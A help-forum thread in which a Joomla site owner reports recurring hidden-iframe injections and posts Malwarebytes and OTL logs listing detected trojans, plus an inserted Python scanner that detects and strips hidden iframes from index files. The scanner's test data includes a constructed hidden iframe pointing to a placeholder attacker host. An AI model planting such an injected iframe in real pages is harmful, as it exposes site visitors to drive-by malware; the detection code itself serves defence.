[OK] Request for analysis of reports


Forum rules
Assiste.com has suspended decontamination assistance after almost 15 years, first on the old forum and then on this one. See:

Decontamination procedure 1 - Anti-malware (Anti-malware decontamination)
Decontamination procedure 2 - Anti-malware and antivirus (La Manip - Standard decontamination procedure)
Periodic maintenance of a Windows PC
Protecting the browser, browsing and privacy


Post by bea23 » 11 May 2011, 16:04

Hello,

For a few months now, my Joomla sites hosted at OVH have been crashing regularly.
The suspected cause is a virus that adds an iFrame line to every index.html file of the site, using the FTP login details stored on my machine.
http://forum.joomla.fr/showthread.php?95673-iframe-injection&highlight=iframe+injection

Several times I hoped I had solved the problem, since Avast, then AVG, and finally Kaspersky PURE each in turn detected and removed infections for me. But after each of these supposed clean-ups, the problem came back.

So I decided to turn to the community to help me find a solution.
After following the tutorial above to the letter, here are my reports.

Thanks in advance for your insight!

Malwarebytes REPORT:

Malwarebytes' Anti-Malware 1.50.1.1100
http://www.malwarebytes.org

Database version: 6554

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

11/05/2011 13:38:02
mbam-log-2011-05-11 (13-37-55).txt

Scan type: Quick scan
Objects scanned: 197834
Time elapsed: 15 minute(s), 55 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 1
Files Infected: 4

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{09F1ADAC-76D8-4D0F-99A5-5C907DADB988} (Rogue.Multiple) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{7545D8C8-F53C-4E2F-8FA0-D248EF4A6E61} (Rogue.Installer) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Folders Infected:
c:\Recycle.Bin (Trojan.Spyeyes) -> No action taken.

Files Infected:
c:\documents and settings\Karim\application data\avdrn.dat (Malware.Trace) -> No action taken.
c:\WINDOWS\system32\config\systemprofile\menu démarrer\programmes\security tool.lnk (Rogue.SecurityTool) -> No action taken.
c:\documents and settings\Karim\local settings\Temp\0.2590682087663877.exe (Trojan.Dropper) -> No action taken.
c:\Recycle.Bin\config.bin (Trojan.Spyeyes) -> No action taken.

bea23

Posts: 16
Joined: 11 May 2011, 08:49
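Added example, not code from bea23's post or from the thread: a small Python scanner for the symptom described above, a hidden iframe appended to the site's index files. It walks a web root, reports every iframe found in an index file with a hidden/visible verdict (CSS hiding, 0/1-pixel dimensions, off-screen positioning), and can strip the hidden ones while keeping a backup. The Joomla-like directory layout, the file contents and the host attacker.invalid are constructed for the demonstration; index.php and index.htm are included on the assumption that a Joomla site is mostly PHP, which the post does not say.

```python
"""Added example: find the hidden-iframe injection described in the post above.
Not code from the thread; the site layout, file contents and the host
attacker.invalid are constructed for this demonstration."""
import os
import re
import tempfile

# The post names index.html; index.php/index.htm are an assumption (Joomla is PHP).
INDEX_NAMES = {"index.html", "index.htm", "index.php"}

IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
IFRAME_BLOCK_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(tag):
    """Attributes of one opening tag as a lower-cased dict of stripped values."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value.strip()
    return attrs


def is_hidden_iframe(tag):
    """Heuristics for the invisible iframe that drive-by injectors plant:
    CSS hiding, 0/1-pixel dimensions, or an off-screen absolute position."""
    m = IFRAME_TAG_RE.search(tag)
    if not m:
        return False
    attrs = parse_attrs(m.group(0))
    style = attrs.get("style", "").lower().replace(" ", "")
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if re.search(r"(width|height):[01](px)?(;|$)", style):
        return True
    if "position:absolute" in style and re.search(r"(left|top):-\d", style):
        return True
    return any(attrs.get(d, "").rstrip("px") in ("0", "1") for d in ("width", "height"))


def scan_webroot(root):
    """Walk root and return every iframe found in an index file, flagged hidden
    or visible.  'path' is relative to root with '/' separators."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in INDEX_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            for m in IFRAME_TAG_RE.finditer(content):
                tag = m.group(0)
                findings.append({
                    "path": os.path.relpath(path, root).replace(os.sep, "/"),
                    "abspath": path,
                    "line": content.count("\n", 0, m.start()) + 1,
                    "src": parse_attrs(tag).get("src", ""),
                    "hidden": is_hidden_iframe(tag),
                })
    return sorted(findings, key=lambda f: (f["path"], f["line"]))


def remove_hidden_iframes(path):
    """Strip hidden <iframe>...</iframe> blocks from one file, keeping the
    original as path + '.bak'.  Returns the number of blocks removed."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        original = fh.read()
    removed = 0

    def drop_if_hidden(m):
        nonlocal removed
        if is_hidden_iframe(m.group(0)):
            removed += 1
            return ""
        return m.group(0)

    cleaned = IFRAME_BLOCK_RE.sub(drop_if_hidden, original)
    if removed:
        with open(path + ".bak", "w", encoding="utf-8") as fh:
            fh.write(original)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(cleaned)
    return removed


# Constructed sample content; attacker.invalid is a placeholder, not an indicator.
CLEAN_INDEX = "<html><body><h1>Site</h1></body></html>\n"
INJECTED_INDEX = ("<html><body><h1>Site</h1>\n"
                  '<iframe src="http://attacker.invalid/in.php" width="1" height="1" '
                  'style="visibility: hidden"></iframe>\n'
                  "</body></html>\n")
LEGIT_EMBED = ('<html><body><iframe src="https://video.example.com/embed/1" '
               'width="560" height="315"></iframe></body></html>\n')


def build_sample_site(base=None):
    """Write a small Joomla-like tree under base (a fresh temp dir if None)."""
    base = base or tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "index.php": INJECTED_INDEX,
        "templates/beez/index.html": INJECTED_INDEX,
        "templates/beez/style.css": "body {}\n",  # not an index file: skipped
        "media/index.html": CLEAN_INDEX,
        "pages/video/index.html": LEGIT_EMBED,    # visible iframe: reported, not hidden
    }
    for rel, body in layout.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return base


if __name__ == "__main__":
    root = build_sample_site()
    for f in scan_webroot(root):
        print(f"{('HIDDEN' if f['hidden'] else 'visible'):8} {f['path']}:{f['line']} src={f['src']}")
```

Run it as-is to see the two injected files flagged and the legitimate video embed reported as visible. Cleaning the files is only half the job: if the FTP credentials the injector used are still stored on the infected PC and unchanged on the hosting side, the iframes come back, which is the pattern the post describes.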

Re: Request for analysis of reports

Post by bea23 » 11 May 2011, 16:05

OTL REPORT:

OTL logfile created on: 11/05/2011 13:40:52 - Run 1
OTL by OldTimer - Version 3.2.22.3 Folder = C:\Documents and Settings\Karim\Bureau
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 0000080C | Country: Belgique | Language: FRB | Date Format: d/MM/yyyy

1.023,00 Mb Total Physical Memory | 506,00 Mb Available Physical Memory | 49,00% Memory free
2,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 127,99 Gb Total Space | 64,78 Gb Free Space | 50,62% Space Free | Partition Type: NTFS
Drive E: | 3,83 Gb Total Space | 2,44 Gb Free Space | 63,74% Space Free | Partition Type: FAT32
Drive F: | 3,87 Gb Total Space | 3,83 Gb Free Space | 98,78% Space Free | Partition Type: FAT32
Drive G: | 1,86 Gb Total Space | 0,68 Gb Free Space | 36,61% Space Free | Partition Type: FAT

Computer Name: KARIM-PBDRK3C5J | User Name: Karim | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2011/05/11 13:12:16 | 000,580,608 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
PRC - [2010/10/01 22:06:36 | 000,348,760 | ---- | M] (Kaspersky Lab) -- C:\Program Files\Kaspersky Lab\Kaspersky PURE\avp.exe
PRC - [2010/04/21 11:12:18 | 000,067,616 | ---- | M] (StorageCraft Technology Corporation) -- C:\WINDOWS\system32\vsnapvss.exe
PRC - [2010/04/21 11:10:10 | 001,649,184 | ---- | M] (StorageCraft Technology Corporation) -- C:\Program Files\StorageCraft\ShadowProtect\ShadowProtectSvc.exe
PRC - [2009/12/21 17:34:38 | 000,743,992 | ---- | M] (Infowatch) -- C:\Program Files\Fichiers communs\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe
PRC - [2009/02/19 00:33:08 | 000,809,488 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\SetPoint.exe
PRC - [2009/02/19 00:28:52 | 000,076,304 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Fichiers communs\Logishrd\KHAL2\KHALMNPR.exe
PRC - [2008/11/20 14:20:54 | 000,290,088 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes2\iTunesHelper.exe
PRC - [2008/11/07 15:28:16 | 000,132,424 | ---- | M] (Apple Inc.) -- C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
PRC - [2008/04/14 04:34:03 | 001,037,824 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2005/01/18 17:37:30 | 000,217,088 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\Video\LogiTray.exe
PRC - [2005/01/18 17:08:36 | 000,192,512 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\Video\FxSvr2.exe
PRC - [2004/12/24 11:11:46 | 000,069,632 | ---- | M] (HP) -- C:\WINDOWS\system32\HPZipm12.exe
PRC - [2004/10/08 11:52:32 | 000,221,184 | ---- | M] (Logitech Inc.) -- C:\WINDOWS\system32\LVCOMSX.EXE
PRC - [2003/12/01 11:38:16 | 000,892,928 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\iTouch\iTouch.exe
PRC - [2003/11/14 09:50:00 | 000,037,888 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\MouseWare\system\EM_EXEC.EXE
PRC - [2003/06/19 23:25:00 | 000,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE
PRC - [2003/03/27 10:34:58 | 000,053,248 | ---- | M] (Realtek Semiconductor Corp.) -- C:\WINDOWS\SOUNDMAN.EXE


========== Modules (SafeList) ==========

MOD - [2011/05/11 13:12:16 | 000,580,608 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
MOD - [2010/10/01 22:05:42 | 000,129,624 | ---- | M] (Kaspersky Lab) -- C:\Program Files\Kaspersky Lab\Kaspersky PURE\shellex.dll
MOD - [2010/08/23 18:12:39 | 001,054,208 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
MOD - [2009/07/12 02:12:06 | 000,632,656 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll
MOD - [2009/07/12 02:09:20 | 000,554,832 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll
MOD - [2009/02/19 00:31:16 | 000,045,584 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\lgscroll.dll
MOD - [2003/12/01 11:31:44 | 000,004,608 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\iTouch\itchhk.dll
MOD - [2003/12/01 11:31:42 | 000,114,688 | ---- | M] (Logitech Inc.) -- C:\Program Files\Fichiers communs\Logitech\Scrolling\LGMSGHK.DLL
MOD - [2003/11/14 09:50:00 | 000,006,144 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\MouseWare\system\LgWndHk.dll


========== Win32 Services (SafeList) ==========

SRV - File not found [Auto | Stopped] -- -- (WSCM)
SRV - File not found [Auto | Stopped] -- -- (SNDSrvc)
SRV - [2010/10/01 22:06:36 | 000,348,760 | ---- | M] (Kaspersky Lab) [Auto | Running] -- C:\Program Files\Kaspersky Lab\Kaspersky PURE\avp.exe -- (AVP)
SRV - [2010/04/21 11:12:18 | 000,067,616 | ---- | M] (StorageCraft Technology Corporation) [Auto | Running] -- C:\WINDOWS\system32\vsnapvss.exe -- (VSNAPVSS)
SRV - [2010/04/21 11:10:10 | 001,649,184 | ---- | M] (StorageCraft Technology Corporation) [Auto | Running] -- C:\Program Files\StorageCraft\ShadowProtect\ShadowProtectSvc.exe -- (ShadowProtectSvc)
SRV - [2009/12/21 17:34:38 | 000,743,992 | ---- | M] (Infowatch) [Auto | Running] -- C:\Program Files\Fichiers communs\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe -- (CSObjectsSrv)
SRV - [2009/10/27 10:26:36 | 000,657,408 | ---- | M] (Nokia) [On_Demand | Stopped] -- C:\Program Files\PC Connectivity Solution\ServiceLayer.exe -- (ServiceLayer)
SRV - [2009/02/19 00:30:20 | 000,121,360 | ---- | M] (Logitech, Inc.) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Logishrd\Bluetooth\LBTServ.exe -- (LBTServ)
SRV - [2008/11/07 15:28:16 | 000,132,424 | ---- | M] (Apple Inc.) [Auto | Running] -- C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device)
SRV - [2008/10/01 11:30:29 | 000,654,848 | ---- | M] (Macrovision Europe Ltd.) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2008/04/22 11:31:26 | 000,313,840 | ---- | M] (Sonic Solutions) [Auto | Stopped] -- C:\Program Files\Fichiers communs\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe -- (RoxLiveShare9)
SRV - [2008/04/22 11:31:22 | 000,170,480 | ---- | M] (Sonic Solutions) [Auto | Stopped] -- C:\Program Files\Fichiers communs\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe -- (RoxWatch9)
SRV - [2008/04/22 11:31:02 | 001,108,464 | ---- | M] (Sonic Solutions) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe -- (RoxMediaDB9)
SRV - [2008/01/03 19:47:15 | 000,072,704 | ---- | M] (Adobe Systems) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe -- (Adobe LM Service)
SRV - [2005/10/23 20:54:34 | 000,069,120 | ---- | M] (BOONTY) [Disabled | Stopped] -- C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe -- (Boonty Games)
SRV - [2005/08/04 19:37:09 | 000,068,096 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Macromedia Shared\Service\Macromedia Licensing.exe -- (Macromedia Licensing Service)
SRV - [2004/12/24 11:11:46 | 000,069,632 | ---- | M] (HP) [Auto | Running] -- C:\WINDOWS\system32\HPZipm12.exe -- (Pml Driver HPZ12)
SRV - [2004/10/22 03:24:18 | 000,073,728 | ---- | M] (Macrovision Corporation) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe -- (IDriverT)
SRV - [2003/07/28 20:28:22 | 000,089,136 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Microsoft Shared\Source Engine\OSE.EXE -- (ose)
SRV - [2003/06/19 23:25:00 | 000,322,120 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM)


========== Driver Services (SafeList) ==========

DRV - [2011/04/12 12:02:49 | 000,315,408 | ---- | M] (Kaspersky Lab) [File_System | System | Running] -- C:\WINDOWS\system32\drivers\klif.sys -- (KLIF)
DRV - [2010/04/21 11:12:20 | 000,182,048 | ---- | M] (StorageCraft Technology Corporation) [File_System | Boot | Running] -- C:\WINDOWS\System32\drivers\stcvsm.sys -- (stcvsm)
DRV - [2010/04/21 11:11:22 | 000,102,560 | ---- | M] (StorageCraft Technology Corporation) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\sbmount.sys -- (sbmount)
DRV - [2010/02/11 14:02:15 | 000,226,880 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\tcpip6.sys -- (Tcpip6)
DRV - [2009/12/14 12:44:24 | 000,088,632 | ---- | M] (Infowatch) [Kernel | Boot | Running] -- C:\WINDOWS\system32\DRIVERS\CSCrySec.sys -- (CSCrySec)
DRV - [2009/12/14 12:44:24 | 000,039,352 | ---- | M] (Infowatch) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\CSVirtualDiskDrv.sys -- (CSVirtualDiskDrv)
DRV - [2009/10/14 21:18:34 | 000,036,880 | ---- | M] (Kaspersky Lab) [Kernel | Boot | Running] -- C:\WINDOWS\system32\DRIVERS\klbg.sys -- (KLBG)
DRV - [2009/10/06 12:52:50 | 000,007,936 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\usbser_lowerfltj.sys -- (UsbserFilt)
DRV - [2009/10/06 12:52:34 | 000,022,016 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ccdcmbo.sys -- (nmwcdc)
DRV - [2009/10/06 12:52:34 | 000,017,664 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ccdcmb.sys -- (nmwcd)
DRV - [2009/10/06 12:52:34 | 000,007,936 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\usbser_lowerflt.sys -- (upperdev)
DRV - [2009/10/02 19:39:44 | 000,019,472 | ---- | M] (Kaspersky Lab) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\klmouflt.sys -- (klmouflt)
DRV - [2009/09/14 14:42:46 | 000,032,272 | ---- | M] (Kaspersky Lab) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\klim5.sys -- (klim5)
DRV - [2009/09/01 15:29:50 | 000,128,016 | ---- | M] (Kaspersky Lab) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\kl1.sys -- (kl1)
DRV - [2008/12/18 23:43:18 | 000,010,384 | ---- | M] (Logitech, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\LBeepKE.sys -- (LBeepKE)
DRV - [2008/12/18 23:43:06 | 000,020,240 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042Kbd.sys -- (L8042Kbd)
DRV - [2008/10/24 14:31:07 | 000,000,000 | ---- | M] () [Kernel | System | Stopped] -- C:\WINDOWS\System32\drivers\567d76cd.sys -- (567d76cd)
DRV - [2008/08/26 10:26:12 | 000,018,816 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\pccsmcfd.sys -- (pccsmcfd)
DRV - [2006/01/31 15:35:34 | 000,123,248 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\System32\drivers\SYMEVENT.SYS -- (SymEvent)
DRV - [2005/11/21 07:48:21 | 000,016,512 | ---- | M] (Adaptec) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\ASPI32.SYS -- (Aspi32)
DRV - [2005/05/23 08:27:00 | 000,137,884 | R--- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sscdmdm.sys -- (sscdmdm)
DRV - [2005/05/23 08:27:00 | 000,080,272 | R--- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sscdbus.sys -- (sscdbus) SAMSUNG USB Composite Device driver (WDM)
DRV - [2005/05/23 08:27:00 | 000,010,864 | R--- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sscdmdfl.sys -- (sscdmdfl)
DRV - [2005/04/05 11:17:02 | 000,267,192 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\WINDOWS\System32\Drivers\SYMTDI.SYS -- (SYMTDI)
DRV - [2005/04/05 11:17:00 | 000,017,976 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMREDRV.SYS -- (SYMREDRV)
DRV - [2005/04/05 11:16:58 | 000,036,984 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMIDS.SYS -- (SYMIDS)
DRV - [2005/04/05 11:16:56 | 000,047,192 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMNDIS.SYS -- (SYMNDIS)
DRV - [2005/04/05 11:16:54 | 000,173,208 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMFW.SYS -- (SYMFW)
DRV - [2005/04/05 11:16:52 | 000,011,512 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMDNS.SYS -- (SYMDNS)
DRV - [2005/02/03 01:29:28 | 000,009,344 | R--- | M] (Hewlett Packard) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\hpplsbulk.sys -- (HPPLSBULK)
DRV - [2005/01/31 10:12:48 | 000,022,016 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LVUSBSta.sys -- (LVUSBSta)
DRV - [2004/10/08 10:58:34 | 000,585,824 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\lvcm.sys -- (QCMerced)
DRV - [2004/08/03 22:31:34 | 000,020,992 | ---- | M] (Realtek Semiconductor Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\rtl8139.sys -- (rtl8139) Pilote NT de carte Realtek PCI Fast Ethernet à base RTL8139(A/B/C)
DRV - [2003/11/09 00:24:17 | 000,012,953 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\itchfltr.sys -- (itchfltr)
DRV - [2003/11/07 11:50:00 | 000,070,798 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LMouFlt2.Sys -- (LMouFlt2)
DRV - [2003/11/07 11:50:00 | 000,051,486 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042pr2.Sys -- (L8042pr2)
DRV - [2003/11/07 11:50:00 | 000,037,884 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\Lhidusb.sys -- (LHidUsb)
DRV - [2003/11/07 11:50:00 | 000,025,502 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LHIDFLT2.SYS -- (LHidFlt2)
DRV - [2003/11/07 11:50:00 | 000,014,092 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LCCFLTR.SYS -- (LCcfltr)
DRV - [2003/04/28 06:51:24 | 000,606,720 | R--- | M] (WLAN) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\AVWLPUSB.sys -- (AVWLP_USB)
DRV - [2003/04/01 11:51:30 | 000,719,052 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\ALCXWDM.SYS -- (ALCXWDM) Service for Realtek AC97 Audio (WDM)
DRV - [2003/03/28 17:25:51 | 000,003,840 | ---- | M] (Elaborate Bytes) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\ElbyDelay.sys -- (ElbyDelay)
DRV - [2003/03/05 12:19:28 | 000,015,840 | ---- | M] (Creative Technology Ltd.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\PfModNT.sys -- (PfModNT)
DRV - [2001/10/03 10:10:10 | 000,053,920 | ---- | M] (Alcatel Bell) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\alcan5wn.sys -- (alcan5wn) Alcatel SpeedTouch USB ADSL PPP Networking Driver (NDISWAN)
DRV - [2001/10/03 10:09:56 | 000,589,776 | ---- | M] (Alcatel Bell) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\alcaudsl.sys -- (alcaudsl)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Google
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.facebook.com/
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local>

========== FireFox ==========

FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.facebook.com/"
FF - prefs.js..extensions.enabledItems: {b9db16a4-6edc-47ec-a1f4-b86292ed211d}:4.7.3
FF - prefs.js..extensions.enabledItems: jqs@sun.com:1.0
FF - prefs.js..extensions.enabledItems: wrc@avast.com:20110101

FF - HKLM\software\mozilla\Firefox\extensions\\bkmrksync@nokia.com: C:\Program Files\Nokia\Nokia PC Suite 7\bkmrksync\ [2009/12/29 16:47:09 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6.16\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011/03/24 18:25:03 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6.16\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2011/03/24 18:25:03 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Thunderbird\Extensions\\{eea12ec4-729d-4703-bc37-106ce9879ce2}: C:\Program Files\Kaspersky Lab\Kaspersky PURE\THBExt [2011/04/12 12:04:53 | 000,000,000 | ---D | M]

[2010/02/04 18:45:36 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Extensions
[2010/02/04 18:45:36 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Extensions\home2@tomtom.com
[2011/03/24 12:12:21 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\extensions
[2010/05/10 15:33:43 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2010/05/10 15:33:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
